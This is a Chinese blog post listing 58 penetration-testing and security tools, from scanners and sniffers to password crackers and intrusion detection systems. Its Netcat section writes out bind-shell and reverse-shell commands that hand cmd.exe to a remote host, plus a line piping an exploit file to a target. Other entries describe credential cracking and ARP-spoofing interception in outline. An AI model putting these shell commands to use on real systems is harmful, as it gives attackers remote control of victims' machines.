常見黑客滲透測試工具

一、Nessus
是掃描UNIX漏洞的主力工具,隨後棲身Windows。主要功能包括本地和遠程安全審查,支持client/server結構,具有GTK圖形界面,並支持腳本語言編寫插件。屬免費開源。

二、Wireshark
說起Wireshark,不得不提Ethereal,Ethereal和Windows的sniffer pro並稱網絡嗅探工具雙雄,不過和sniffer pro不同的是Ethereal在Linux類系統中應用更爲廣泛。而Wireshark則是Ethereal後續版本,是在Ethereal被收購後推出的最新網絡嗅探軟件,是功能強大的網絡數據捕獲工具,可分析網絡數據流量,在第一時間發現蠕蟲病毒,木馬程序以及ARP欺騙等問題的根源。

三、Snort
Snort免費跨平臺,用作監視小型TCP/IP網的嗅探器、日誌記錄、侵入探測器。可運行linux/UNIX和Win,snort有三種工作模式:嗅探器、數據包記錄器、網絡入侵檢測系統。
嗅探器模式是snort從網絡上讀出數據包然後顯示控制檯上。例如要把TCP/IP包頭信息打印在屏幕上,需要輸入命令:snort -v

四、Netcat
netcat被譽爲‘瑞士軍刀’,一個簡單有用的工具,透過使用TCP或UDP協議的網絡連接讀寫數據。它被設計成一個穩定的後門工具,是一個功能強大的網絡調試和探測工具。
1)例子:連到192.168.x.x的TCP80端口的命令:nc -nvv 192.168.x.x 80
2) 監聽本機的TCP80端口: nc -l -p 80
3) 掃描192.168.x.x的TCP80到TCP445的所有端口: nc -nvv -w2 -z 192.168.x.x 80-445
4) 綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口REMOTE主機綁定SHELL: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
5)REMOTE主機綁定SHELL並反向連接,例如:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口的命令:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
6)作攻擊程序用,例子:連接到192.168.x.x的80端口,並在其管道中發送’c:\exploit.txt’內容:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
7)作蜜罐用,例子:使用’-L’(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c爲止
格式:nc -L -p 80

五、Metasploit Framework
是一個編寫、測試和使用exploit代碼的完善環境。這個環境爲滲透測試,shellcode編寫和漏洞研究提供了一個可靠的平臺,這個框架主要是由面向對象的Perl編程語言編寫的,並帶有由C語言,彙編程序和Python編寫的可選組件。Metasploit Framework 作爲一個緩衝區溢出測試使用的輔助工具,也可以說是一個漏洞利用和測試平臺。它集成了各平臺上常見的溢出漏洞和流行的shellcode,並且不斷更新,使得緩衝區溢出測試變得方便和簡單。

六、Hping2
Hping2:一種網絡探測工具,是ping的超級變種,這個小工具可以發送自定義的ICMP,UDP和TCP數據包,並接收所有反饋信息。例如可以設置時間間隔,數據包發送的頻率(-i uX X爲微秒),命令爲:hping2 192.168.0.1 -c 2 -i u1000

七、Kismet
Kismet是一個基於Linux的無線網絡掃描程序,一個相當方便的工具,通過測量周圍無線信號找到目標WLAN。當Kismet開始運行時,將會顯示這個區域內它找到所有的無線局域網,“Name”列中所顯示出來的就是WLAN中AP的SSID值,開始設定的目標WLAN也應該包含中其中,在這一行中,CH列的值(AP所使用的頻道)應該與開始所記下的相同。在窗口的最右邊顯示的信息是Kismet發現的WLAN的數目,已被捕捉下來了的數據包、已加密了的數據包的數目等等。甚至當目標計算機已關閉時,Kismet也正可從我們的目標AP中檢測到數據包,這是因爲目標AP在不停地發出“beacons”,它將告之擁有無線網卡的計算機有一個AP在此範圍內。

八、Tcpdump
基於linux 的TcpDump可以將網絡中傳送的數據包的“頭”完全截獲下來提供分析。它支持針對網絡層、協議、主機、網絡或端口的過濾,並提供and、or、not等邏輯語句來幫助你去掉無用的信息。tcpdump就是一種免費的網絡分析工具,尤其其提供了源代碼,公開了接口,因此具備很強的可擴展性,對於網絡維護和入侵者都是非常有用的工具。

九、Cain and Abel
是一款Windows平臺下的口令恢復工具。它通過採用多種方式來恢復多種口令,採取方式包括:嗅探網絡,使用字典、暴力、密碼分析方法破解解密口令,記錄VoIP會話,解碼混雜口令,恢復無線網絡密鑰,揭示口令框中輸入的口令(星號查看),披露緩衝口令和分析路由協議。這個工具沒有利用任何軟件漏洞或缺陷,它利用了協議標準、認證方法和緩衝機制本身存在的安全問題以及內在的弱點,其主要目的是簡單地恢復多種程序的口令和憑證。該軟件由兩部分組成:Cain和Abel。Cain(Cain.exe)是程序的主圖形界面,Abel是一個Windows服務,由文件Abel.exe和Abel.dll組成。

十、John the Ripper
用於在已知密文的情況下嘗試破解出明文的破解密碼軟件。目前的最新版本是 JOHN 1.4 版, 主要支持對 DES、 MD5 兩種加密方式的密文進行破解工作。它可以工作於多中不同 的機 型 以及多種不同的操作系統。

十一、Ettercap
Ettercap最初設計爲交換網上的sniffer,但是隨着發展,它獲得了越來越多的功能,成爲一款有效的、靈活的中介攻擊工具。它支持主動及被動的協議解析幷包含了許多網絡和主機特性(如OS指紋等)分析。Ettercap有5種sniffing工作方式:
(1)IPBASED:基於IP地址的sniffing方式,Ettercap根據源IP-PORT和目的IP-PORT來捕獲數據包。
(2)MACBASED: 基於MAC地址的方式,Ettercap將根據源MAC和目的MAC來捕獲數據包。
(3) ARPBASED : 基於ARP欺騙的方式下,Ettercap利用ARP欺騙在交換局域網內監聽兩個主機之間的通信(全雙工)。
(4) SMARTARP: 在SMARTARP方式下,Ettercap利用ARP欺騙,監聽交換網上某臺主機與所有已知的其他主機(存在於主機表中的主機)之間的通信(全雙工)。
(5) PUBLICARP : 在PUBLICARP方式下,Ettercap利用ARP欺騙,監聽交換網上某臺主機與所有其它主機之間的通信(半雙工)。

十二、Nikto
Nikto 是一款開放源代碼的、功能強大的WEB掃描評估軟件,能對web服務器多種安全項目進行測試的掃描軟件,能在230多種服務器上掃描出 2600多種有潛在危險的文件、CGI及其他問題,它可以掃描指定主機的WEB類型、主機名、特定目錄、COOKIE、特定CGI漏洞、返回主機允許的 http模式等等。它也使用LibWhiske庫,但通常比Whisker更新的更爲頻繁。Nikto是網管安全人員必備的WEB審計工具之一。

十三、Ping/telnet/dig/traceroute/whois/netstat:最基本的安全命令。

十四、OpenSSH / PuTTY / SSH
SSH(Secure Shell)現在普遍應用於登錄遠程計算機或在其上執行命令。爲不安全網絡上的兩臺不互信計算機間通訊提供安全加密,代替非常不可靠的telnet/rlogin/rsh交互內容。大多unix使用開源的OpenSSH服務器和客戶端程序。Windows用戶更喜歡免費的PuTTY客戶端,也可以運行在多種移動設備上。還有一些windows用戶喜歡使用基於終端的OpenSSH模擬程序Cygwin。

十五、THC Hydra
如果某人需要暴力破解一個遠程認證服務,Hydra經常會是選擇對象。它可以同時對30個以上的端口進行基於字典的快速破解,包括telnet、ftp、http、https、smb、多種數據庫及其它服務。和THC Amap一樣,Hydra來自於民間組織THC。

十六、Paros proxy
proxy是架設在攻擊者的瀏覽器和目標網站中間,所有的要求和迴應都會被送到,藉此駭客得以仔細研究這些封包資訊,包括在網頁傳送中的、變數,並可以修改這些變數後再送出。proxy功能齊全,具備網站弱點掃描和偵測能力,對一些常見的網頁應用程序攻擊,都可進行檢測,甚至能夠檢測出不安全的網頁組件。

十七、Dsniff
Dsniff是一個高級的口令嗅探器,是第一批擴展了傳統Sniffer概念的監聽工具,將製造的數據包注入網絡,並將通信數據重新定向到攻擊者的機器。在這種方式下,Dsniff允許攻擊者在交換環境的網絡內竊聽數據,甚至在攻擊者和攻擊目標不在同一個Lan,也能使攻擊者收集到想要的數據。支持telnet 、ftp、smtp、pop、imap、http應用協議。十八、NetStumbler
NetStumbler 是一款專門用來尋找無線AP的工具,是目前最流行的無線搜尋工具。開啓後能自動顯示附近探測到的無線AP,並能顯示這些無線AP的SSID、MAC地址、頻段、速度、是否加密等信息。值得一提的是,NetStumbler可以顯示設置了隱藏SSID的無線AP,在軟件界面中可以看到該AP的綠燈在不斷閃爍。在樹狀結構中列出了各頻段檢測到的無線AP。由於NetStumbler進行全面掃描,所以附近無線AP將一覽無餘。因爲它是美國人開發的,所以只能檢測1~11之間的11個頻段,而國內無線頻段分爲13個頻段,12~13頻段的無線AP將無法搜尋到。

十九、THC Amap
它可以檢測出某一端口正在被什麼程序監聽。因爲其獨有的version detection特性,所以其數據庫不會象Nmap一樣變得很大,在Nmap檢測某一服務失敗或者其它軟件不起作用時可以考慮使用之。Amap的另一特性是其能夠解析Nmap輸出文件。這也是THC貢獻的另一款很有價值的工具。

二十、GFI LANguard
企業網絡漏洞管理的三大主要問題:網絡掃描、網絡審計和補丁管理。GFI LANguard Network Security Scanner (N.S.S.) 是一項屢獲殊榮的解決方案,能夠掃描、檢測、評估和修復網絡中的任何安全漏洞。作爲管理員您經常需要處理各種不同的問題,有時會使用多種產品分別處理與網絡漏洞、補丁管理和網絡審計相關的問題。使用 GFI LANguard N.S.S.,漏洞管理的三大主要問題可以通過帶有豐富報告功能的單個控制面板得以解決。

二一、Aircrack
Aircrack是一套用於破解8WEP和WPA的工具套裝,一般用於無線網絡的密鑰破解,從而非法進入未經許可的無線網絡。只要一旦收集到足夠的加密數據包,利用它就可以破解40到512位的WEP密匙,也可以通過高級加密方法或暴力破解來破解WPA1或2網絡。

二二、Superscan
SuperScan 是由Foundstone開發的一款免費的,但功能十分強大的工具,與許多同類工具比較,它既是一款黑客工具,又是一款網絡安全工具。一名黑客可以利用它的拒絕服務攻擊(DoS,denial of service)來收集遠程網絡主機信息。而做爲安全工具,SuperScan能夠幫助你發現你網絡中的弱點。

二三、Netfilter
通俗的說,netfilter的架構就是在整個網絡流程的若干位置放置了一些檢測點(HOOK),而在每個檢測點上上登記了一些處理函數進行處理(如包過濾,NAT等,甚至可以是用戶自定義的功能)。

二四、Sysinternals
Sysinternals屬於一套安全管理套件,主要包括:
(1)Process Explorer:進程管理工具,可以設置爲完全取代系統自帶任務管理器taskmgr,成爲系統默認的“任務管理器”。裏頭的各種監視器非常直觀地監視或者記錄着系統當前的狀態,而且易用性非常高。支持XP及Win2003以上系統。
(2)PsTools:一共由12個命令組成,可以用來遠程管理Windows NT/2000/XP系統。可以遠程整理硬盤、關閉遠程計算機上運行的信使服務、查看服務器硬盤空間、查看遠程計算機上的進程,並結束可疑進程、發送消息並快速關閉遠程計算機等。
(3)Autoruns:強大、完整的啓動項掃描工具!
(4)TCPView:檢測端口的軟件,很小很好用。
(5)RootkitRevealer:可以用來檢測系統Windows系統裏邊是否運行着Rootkit,它通過分析註冊表和系統API文件差異,能檢測出來www.rootkit.com發佈的所有rootkit,包括AFX、Vanquish、HackerDefender 等(注意:RootkitRevealer是不能夠檢測那些沒有隱藏文件和註冊表的Rootkit,比如FU_Rootkit)。

二五、Retina
Retina 已經被業界認爲是最精確的非嵌入式網絡安全掃描器,它包含有最全面的安全漏洞數據庫,該數據庫由eEye公司的研發隊伍所維護。作爲一個同時面向分佈式企業用戶和單機網絡環境用戶的專業安全軟件,Retina已經被許多世界上最大的公司和政府部門使用。他們用於檢測各個分公司/總公司/政府部門的網絡安全,矯正網絡中隱藏的漏洞和不安全的設置。

二六、Perl / Python / Ruby
perl比ruby或者python都要古老些。perl曾經是最流行的腳本語言,曾經也被認爲是黑客必備。可以只用幾行就完成複雜數據的處理,而且速度不必同樣的c慢許多,內置的對正則表達式和數據結構的支持更是令人驚歎。 以前許多網站都用perl寫的。即使現在,國外有些較老的網站也有部分代碼還是perl。perl最強大之處在於它有數不清的庫支持,perl可是說有着世界上最大的社區,你想做什麼事情都找得到相應的庫。但是perl的缺點也很明顯:perl的程序實在是太靈活了,一個問題通常有非常多的解決方案,正如一句話有非常多的說法一樣,而且perl的語法對於不熟悉它的人完全是天書。ruby和python都是作爲perl的替代者出現的。最新的perl加入了對面向對象的支持,ruby和python對面向對象的支持更好(甚至要好於java)。

二七、L0phtcrack
L0phtCrack v5.04,簡稱LC 5,這是一款網絡管理員的必備的工具,它可以用來檢測Windows、UNIX 用戶是否使用了不安全的密碼,同樣也是最好、最快的Win NT/2000/XP/UNIX 管理員帳號密碼破解工具。事實證明,簡單的或容易遭受破解的管理員密碼是最大的安全威脅之一,因爲攻擊者往往以合法的身份登陸計算機系統而不被察覺。

二八、Scapy
Scapy是一款強大的交互式數據包處理工具、數據包生成器、網絡掃描器、網絡發現工具和包嗅探工具。它提供多種類別的交互式生成數據包或數據包集合、對數據包進行操作、發送數據包、包嗅探、應答和反饋匹配等等功能。

二九、Sam Spade
SamSpade提供了一個友好的GUI界面,能方便地完成多種網絡查詢任務,它開發的本意是用於追查垃圾郵件製造者,但也能用於其它大量的網絡探測、網絡管理和與安全有關的任務,包括ping、nslookup、whois、dig、traceroute、finger、raw HTTP web browser、DNS zone transfer、SMTP relay check、website search等工具,是一個集成的工具箱。

三十、GnuPG / PGP
隨着網絡與計算機技術的發展,數據存儲與數據交換的安全性已經變得越來越重要,加密技術已經很早就用於數據存和數據交換。爲了確保網絡數據交換時的雙方身份的正確性,簽證體系也已經成熟。GnuPG就是用來加密數據與製作證書的一套工具,其作用與PGP類似。但是PGP使用了許多專利算法。

三一、Airsnort
這個程序利用被使用相當普及、根據一般標準設計的網絡加密系統“Wi-fi”(或稱爲802.11b)的缺點進入網絡,但另一種加密系統則尚未被AirSnort 或WEPCrack 攻破。設計AirSnort的人相信,許多網絡用戶都不重視或無法瞭解有關Wi-fi加密系統的瑕疵。

三二、BackTrack
BackTrack是基於Slackware和SLAX的自啓動運行光盤,它包含了一套安全及計算機取證工具。它其實是依靠融合Auditor Security Linux和WHAX(先前的Whoppix)而創建成的。

三三、P0f
p0f 是繼Nmap和Xprobe2之後又一款遠程操作系統被動判別工具。它支持:反連SYN 模式、正連SYN+ACK 模式、空連RST+ 模式、碎片ACK模式。它還可以探測:是否運行於防火牆之後、是否運行於NAT模式、是否運行於負載均衡模式、遠程系統已啓動時間、 遠程系統的DSL和ISP信息等。

三四、Google:人見人愛的搜索引擎。

三五、WebScarab
一款代理軟件 包括代理,網絡爬行、網絡蜘蛛,會話分析,自動腳本接口,模糊測試工具,對所有流行的格式的編碼/解碼,服務描述語言和解析器等。

三六、Ntop
NTOP可以把端口使用情況與應用程序關聯起來,這和使用“netstat -an”命令的效果類似,並且可以顯示端口打開時間、端口流量等詳細信息。比如,可以把本機開放的TCP/UDP端口同應用程序關聯起來。

三七、Tripwire
是目前最爲著名的unix下文件系統完整性檢查的軟件工具,這一軟件採用的技術核心就是對每個要監控的文件產生一個數字簽名,保留下來。當文件現在的數字簽名與保留的數字簽名不一致時,那麼現在這個文件必定被改動過了。

三八、Ngrep
ngrep 是grep(在文本中搜索字符串的工具)的網絡版,力求更多grep特徵,用於搜尋指定的數據包。正由於安裝ngrep需用到libpcap庫, 所以支持大量的操作系統和網絡協議。能識別TCP、UDP和ICMP包,理解bpf的過濾機制。

三九、Nbtscan
一個掃描WINDOWS網絡NetBIOS信息的小工具,但只能用於局域網,可以顯示IP,主機名,用戶名稱和MAC地址等等。

四十、WebInspect
被認爲是下一代Web 應用程序安全性測試工具,主要功能介紹:(1)利用創新的評估技術檢查 Web 服務及 Web 應用程序的安全;(2)自動執行 Web 應用程序安全測試和評估;(3)在整個生命週期中執行應用程序安全測試和協作;(4)通過最先進的用戶界面輕鬆運行交互式掃描;(5)利用高級工具 (HP Security Toolkit) 執行滲透測試;(6)配置以支持任何 Web 應用程序環境。

四一、OpenSSL
SSL是Secure Socket Layer(安全套接層協議)的縮寫,可以在Internet上提供祕密性傳輸。OpenSSL整個軟件包可分成三個主要的功能部分:密碼算法庫、SSL協議庫以及應用程序。

四二、Xprobe2
Xprobe2通過模糊矩陣統計分析主動探測數據報對應的ICMP數據報特徵,進而探測得到遠端操作系統的類型。

四三、EtherApe
網絡嗅探器,能夠完成與Tcpdump相同的功能,但操作界面要友好很多。Ehtereal和Tcpdump都依賴於pcap庫(libpcap),因此兩者在許多方面非常相似(如都使用相同的過濾規則和關鍵字)。Ethereal和其它圖形化的網絡嗅探器都使用相同的。

四四、Core Impact
公認最強漏洞檢測工具,全面評估偵測,防止和應對信息安全威脅。由安全地複製真實世界的攻擊網絡服務器和工作站,最終用戶的系統,以及Web應用程序,可協助尋找並修復安全問題。

四五、IDA Pro
是一個交互“分析員”,然而並不自動解決問題,IDA Pro 會發現指令可疑之處,並不去解決這些問題。您的工作是通知 IDA 怎樣去做。

四六、SolarWinds
一個專業的網絡管理軟件,可以監控,發現網絡設備。包括以下工具:
1. 網絡性能監控(Network Performance Monitoring):帶寬測量、路由CPU負荷、帶寬監控、CPU測量、網絡性能監控器、SNMP圖象和高級CPU上傳。
2. 網絡發現(Network Discovery):子網列表、Ping Sweep、和IP網絡瀏覽器、DNS覈查、IP地址管理、MAC地址發現、SNMP Sweep、網絡定位。
3. 用於Cisco網絡的工具:IP網絡瀏覽器、路由CPU負荷、配置下載、配置上傳、配置編輯器/瀏覽器、Proxy Ping、對比運行VS啓動配置、路由器密碼加密術、CPU測量(、路由器安全檢查和高級CPU上傳。
4. 網絡監控:Watch It!、網絡監控器、Syslog 服務器、路由CPU負荷、高級ping和網絡性能監控器。
5. IP地址管理(IP Address Management ):先進的子網計算器、DNS / Who Is Resolver、DHCP Scope Monitor、DNS覈查、IP地址管理、Ping Sweep。
6. 安全性(Security):路由安全性檢查、TCP Reset、字典編輯器、SNMP Brute Force 攻擊、SNMP詞典攻擊、路由器密碼加密術。
7. Ping & Diagnostic :ping、高級ping、Trace Route、Proxy Ping、Ping Sweep。
8. MIB瀏覽器:MIB Walk、更新系統MIBs、MIB瀏覽器、MIB瀏覽器和SNMP圖象。
9. 其它:TFTP服務器、WAN Killer、Wake-On-Line。

四七、Pwdump:一個用來抓取Windows用戶密碼文檔的工具。

四八、LSoF
全名list opened files,也就是列舉系統中已經被打開的文件。我們知道,linux環境中任何事物都是文件,設備是文件,目錄是文件,甚至sockets也是文件。所以,用好lsof命令,對日常linux管理非常有幫助。

四九、RainbowCrack
一個多功能密碼破解軟件,不僅能夠破解密碼,同時也是雜亂算法加密的破解利器。比如可破解im,md5,sha1,customizable等,其它加密方式破解也可添加到該軟件中。軟件同時支持Windows和Linux系統,而且在一個系統上生成的表單可以直接轉換到另一種系統上使用,它功能雖然強大,但使用較複雜。

五十、Firewalk
Linux網絡安全工具,使用類似traceroute技術來分析IP包響應,從而測定網關訪問控制列表和繪製網絡圖的工具。

五一、Angry IP Scanner
一款使用方便的 IP、端口掃描工具,可獲得被掃描計算機的ping響應時間、主機名稱、計算機名稱、工作組、登錄用戶名、MAC地址、TTL、NetBios 信息等;也可指定掃描端口,查看目標計算機開放端口的情況;對於活動主機,可執行在資源管理器中打開、利用網頁瀏覽器瀏覽、FTP、telnet、ping、tracert 或利用網頁查找指定 IP 的地理位置等操作。只需一個網址或主機名稱,Angry IP Scanner 就能自動解析其 IP 地址並進行掃描。Angry IP Scanner 還支持自動選取並掃描整個 B 類和 C 類 IP 段,對常用 IP 進行收藏管理,導出掃描結果爲多種文件格式等。由於採用多線程掃描,Angry IP Scanner 可以同時對幾十個 IP 發起掃描,因此速度極快。

五二、RKHunter
中文名”Rootkit獵手”, 可發現大約58個已知rootkits和一些嗅探器和後門程序. 它通過執行一系列的測試腳本來確認機器是否已感染rootkits。

五三、Ike-scan
一款檢測IKE(Internet Key Exchange)服務傳輸特性的工具,IKE是VPN網絡中服務器和遠程客戶端建立連接的機制。在掃描到VPN服務器IP地址後,將改造過的IKE數據包分發給VPN網中的每一主機。只要是運行IKE的主機就會發回反饋來證實其存在。此工具然後對這些反饋數據包進行記錄和顯示,並將它們和一系列已知VPN產品指紋進行對比。

五四、Arpwatch
ARP(Address Resolution Protocol)是用來解析IP與網絡裝置硬件地址的協議。在linux系統下arpwatch可監聽區域網絡中ARP數據包並記錄,同時將監聽到的變化通過E-mail來報告。

五五、KisMAC
一款免費的無線協議嗅探程序,可用於Mac OX操作系統。KisMAC應用程序在安裝時不安全更改文件權限,本地攻擊者可以利用這個漏洞未授權訪問敏感文件信息。

五六、OSSEC HIDS
一款開源入侵檢測系統,包括了日誌分析,全面檢測,rook-kit檢測。作爲一款HIDS,OSSEC應該被安裝在一臺實施監控的系統中。另外有時不需要安裝完全版本OSSEC,如果有多臺電腦都安裝了OSSEC,那麼就可以採用客戶端/服務器模式來運行。客戶機通過客戶端程序將數據發回到服務器端進行分析。在一臺電腦上對多個系統進行監控對於企業或者家庭用戶來說都是相當經濟實用的。OSSEC最大優勢在於它幾乎可以運行在任何一種操作系統上,比如Windows, Linux, OpenBSD/FreeBSD 以及 MacOS。不過運行在Windows的客戶端無法實現root-kit檢測,而其他系統上客戶端都沒有問題。

五七、Openbsd PF
OpenBSD用戶最愛用PF,這就是他們的防火牆工具。功能有網絡地址轉換、管理TCP/IP通訊、提供帶寬控制和數據包分級控制。它還有一些額外功能,例如被動操作系統檢測。PF是由編寫OpenBSD的同一批人編寫的,它已經過了很好評估、設計和編碼以避免暴露其它包過濾器(other packet filters)上的類似漏洞。

五八、Nemesis:幾乎可以用來構造任何類型的ICMP數據包。


想了解更多精彩內容請關注我的公衆號

本人簡書blog地址:http://www.jianshu.com/u/1f0067e24ff8    
點擊這裏快速進入簡書
GIT地址:http://git.oschina.net/brucekankan/
點擊這裏快速進入GIT

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章